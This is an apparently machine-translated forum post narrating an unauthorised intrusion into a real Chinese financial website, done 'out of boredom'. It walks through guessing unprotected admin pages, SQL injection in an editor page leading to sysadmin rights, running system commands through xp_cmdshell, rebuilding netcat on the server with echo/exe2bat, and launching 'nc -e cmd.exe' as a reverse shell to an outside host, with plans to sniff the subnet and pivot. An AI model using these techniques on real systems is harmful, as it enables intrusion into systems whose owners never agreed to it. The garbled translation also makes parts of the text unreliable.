A security test on a well-known financial site in China

Site: www. **** .com.cn (I blocked the address)

Purpose: only conduct technical exchanges without any other intention

Cause: Pure boredom

Go '''''

Www. **** .com.cn is a well-known financial information site in China, and its site scale is also very large! I was once reported by many media outlets such as CCTV in China. Today, when I accidentally pass this station, I am bored to check whether his security is the same as his popularity '''

The website structure is the most abnormal one I have ever seen. The script consists of ASP,. net, and JSP.

After a rough scan of the site, the server sets an error of 500, so no matter whether any POST is returned, the 200 report is returned. Therefore, it is no use to scan and mine deep sensitive directories '''

Start to check the script. No injection is detected after GOOGLE site: *** .com.cn inur: jsp asp aspx.

Unexpectedly, start to check the respective slave stations one by one ''''

Because this is about script detection, the server detection process is skipped.

After a long period of detection, the reader channel book of the website is locked. * ** .com.cn this channel uses ASP scripts that have been thoroughly checked and have not found any vulnerabilities such as upload injection ''''

Next, click each connection one by one, then, check the GET package ''' and accidentally find a relatively hidden directory u_adlogin/upload/the source is an image connection '''. At first glance, you will know that it is an upload module., generally, the upload module is used in the background. If you have not guessed it, u_adlogin is the background directory ''''

Start to manually guess the background, admin, admin. asp, login. asp, main. asp, member, manage! GOOD manage jumps out of the background to log on. It doesn't work normally if you try weak passwords OR not ~ Then submit manage/left. asp manage/top. asp, manage/main. asp manage/admin. asp (many may wonder why I submit these files because some websites have column sharding settings in the background, and these column sharding files are generally not verified by cookies or siession, however, their functions are just common navigation.) manage/admin. asp finally jumps out of a menu navigation, including book management, book editing, image management, image uploading, and administrator management. Then, use thunder to download all of them, the URL of the book editing is/HTMLEditor/editput. asp click in. It is good to have no cookie verification ''''

Click a book and jump out of a text editor, but it is surprising that this editor is different from other editors in HTML. It is ASP's HTMLEditor/editbox. asp? Id = 13755 randomly added'

Microsoft ole db Provider for SQL Server error 80040e14
There are unclosed quotation marks before the string.
/Manage/HTMLEditor/editbox. asp, line 77
My God, the legendary background injection has met me. RP is really good !!!

Run it in NBSI. It turns out to be sysadmin.

After obtaining the SA, check whether the extended storage is in good condition.
Exec master. dbo. xp_mongoshell echo adai c: adai.txt ;--
Access this column's c directory and find that adai.txt has been written smoothly! It seems that xpcmdshell can be used directly •••
First, let's take a look at what services are available on the server, net start
I found that I opened a terminal, but I didn't find any IIS service? Ipconfig immediately, and the Web and DATA are separated •••
Netstat-an is found to be C-segment connected to the local machine 1433 information, including the master station, and the IP address of most substations. It seems that this server is not only the database server of the reading channel, but also the database stored by the whole site. GOOD!

The idea is simple. After winning the DATA server, we try to penetrate the master station by the database on the DATA server. If it fails, we will refer to all the servers under section C of sniffer, the message returned by arp-a proves that sniffer can be used directly.
Now that the terminal is on, mastsc is started immediately. The result shows that the connection fails. It is clearly the internet, and netstat-an also finds port 3389. Is it true? Net start immediately. As a result, I made an IP policy and carefully observed other services. I did not find any firewall or software killer.

According to the overall structure of the server, it is estimated that this IP address policy is implemented at home. The system immediately scans the DATA server and finds that only port 21 is open, in addition, 21 does not correspond to FTP • nor to other services. What is the problem? Leave it empty first

Idea: Since the server has implemented an IP policy, I will bounce a shell back, then map the terminal to the local machine, and then create a user OVER ~~~

First, upload The NC, and immediately ECHO the VBS, and run The cscript. the result returns The error c: d. vbs (4, 3) msxml3.dll: the system cannot locate The resource specified.
Msxml3 error? It is estimated that xmlhttp has made a limit, trying to re-register, and then again cscript, still error, no play •••
I tried to write an FTP download script again, and the ftp-s: ftp.txt result showed that the time out... tried several times !! Is there a problem with RP?

Don't worry about the built-in upload of NBSI. The file in binary is doubled!

Some may say that not sp_addlogin users, and then upload them using sqltools .... Please pay attention to the scan report above!
Suddenly in a deadlock, even files can not be transferred, let alone rebound shell ....
Click the root smoke and organize the Train of Thought ''''
By the way, I can't ECHO it. Can I convert the EXE file to BAT and then convert the ECHO code to restore it to the exe file? This exe2bat can be done ••••

So we started to keep ECHO--until the hand was paralyzed and finally completed, dir nc.exe
Volume in drive C has no label.
Volume Serial Number is 30A3-10C5

Directory of C: WINDOWSsystem32

28,160 nc.exe
1 File (s) 28,160 bytes
0 Dir (s) 7,018,565,632 bytes free
Finally, the system listens to port 69 locally and runs nc-e cmd.exe xxx. xx 69 on the server.
After waiting for half a day, the machine did not respond. On the server's tasklist, the NC was successfully executed, but netstat-an did not find the connection information of port 69... Does the server have no network?
Try to ping www.baidu.com
Pinging www.a.shifen.com [220.181.37.55] with 32 bytes of data:
Reply from 220.181.37.55: bytes = 32 time = 1 ms TTL = 55
Reply from 220.181.37.55: bytes = 32 time = 2 ms TTL = 55
Reply from 220.181.37.55: bytes = 32 time = 1 ms TTL = 55
Reply from 220.181.37.55: bytes = 32 time = 1 ms TTL = 55
Ping statistics for 220.181.37.55:
Packets: Sent = 4, stored ED = 4, Lost = 0 (0% loss ),
Approximate round trip times in milli-seconds:
Minimum = 1 ms, Maximum = 2 ms, Average = 1 ms
No problem. You can access the Internet ••••
Telnet the 69 end of the Local Machine, failed ••••
Think of the FTP just now: the time out terminal did not respond, as well as the VBS and the current telnet • suddenly sucked in the air, is the server blocking all TCP data packets out of segment C? In this case, all the general penetration methods will fail --
But it can be pinged. In this case, ICMP data packets are not blocked. There are still some ideas about converting ICMP packets and TCP data packets. This method was heard from a friend, it involves the splitting and encapsulation of packages under the Assembly, but I have caught a cold ~~~
It seems that the DATA server can only be abandoned ••••
However, it's not over yet. The idea can be reversed ~~~~ HOHO